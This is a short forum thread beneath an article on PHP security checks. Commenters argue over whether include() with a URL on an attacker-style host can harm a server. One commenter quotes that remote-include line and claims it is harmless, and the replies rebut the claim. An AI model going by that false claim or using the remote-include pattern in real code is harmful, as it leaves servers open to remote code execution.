Article:		Ten Security Checks for PHP, Part 1
Subject:		Not the kind of article i would expect from o'reilly!
Date:		2003-03-28 09:48:45
From:		anonymous2
First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine. Other stuff like POST and GET global issues have been dealt with php team, and using $_SUPERGLOBALS. This is also true for $_FILES, that can't be tricked in the described way. That *where* good security tips, but maybe a year or two ago.. ..Not the kind of article i would expect from o'reilly.. zombie

Showing messages 1 through 2 of 2.

• Not the kind of article i would expect from o'reilly!
  2005-02-06 03:49:12  bbbbbbbbbbbbbb [Reply | View]
  
  
  "First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine."
  
  Obviously, you assume that www.some-BAD-site.com is running php.
  
  Then, what if it doesn't,eh? ;)

• Not the kind of article i would expect from o'reilly!
  2003-03-29 05:08:06  anonymous2 [Reply | View]
  
  
  Include *can* harm o your server, read the comments in the PHP documentation before you spread misinformation:
  
  http://www.php.net/manual/en/function.include.php